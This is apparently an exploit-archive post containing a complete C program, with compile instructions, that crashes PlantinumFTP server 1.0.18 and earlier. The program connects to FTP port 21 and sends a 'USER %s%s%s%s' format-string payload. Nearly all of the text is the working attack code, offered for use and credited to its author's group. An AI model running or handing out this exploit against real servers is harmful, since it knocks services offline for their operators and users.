PlantinumFTP server <= 1.0.18 Remote DOS exploit
Here is simple exploit for PlantinumFTP server DOS bug.
/*
* PlantinumFTP server <= 1.0.18 Remote DOS exploit
* -------------------------------------------------
* PlantinumFTP server exploit for Remote Denial of Service bug
* in PlantinumFTP founded by ports.
*
* Coded by Exoduks - exoduks[at]gmail.com
* HackGen Team - www.hackgen.org
*
* Compile: gcc -o pFTP_dos pFTP_dos.c
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 21
int main(int argc, char **argv)
{
char buffer[50];
char *host_ip;
int mysock;
struct sockaddr_in name;
struct hostent *myhost;
printf("\n PlantinumFTP server <= 1.0.18 Remote DOS exploit\n");
printf(" -------------------------------------------------\n");
printf(" Coded by Exoduks - exoduks[at]gmail.com\n");
printf(" HackGen Team - www.hackgen.org\n");
printf(" -------------------------------------------------\n");
printf(" [+] Creating socket !\n");
mysock = socket(PF_INET, SOCK_STREAM, 0);
if (mysock == -1) {
printf("[-] Socket error !\n");
return 1;
}
host_ip = argv[1];
if (host_ip == NULL) {
printf(" [-] Host error ! - Usage: %s <ip/host> !\n\n", argv[0]);
return 1;
}
myhost = gethostbyname(host_ip);
name.sin_family = AF_INET;
name.sin_addr = *((struct in_addr*) myhost->h_addr);
name.sin_port = htons(PORT);
printf(" [+] Connecting to target on port %d!\n", PORT);
if (connect (mysock, (struct sockaddr*)&name, sizeof(struct sockaddr_in))
== -1) {
printf(" [-] Connection error !\n");
return 2;
}
printf(" [+] Sending exploit !\n");
sprintf(buffer, "%s", "USER %s%s%s%s\r\n");
write(mysock, buffer, strlen(buffer));
printf(" [+] Exploit sent !\n\n");
close(mysock);
return 0;
}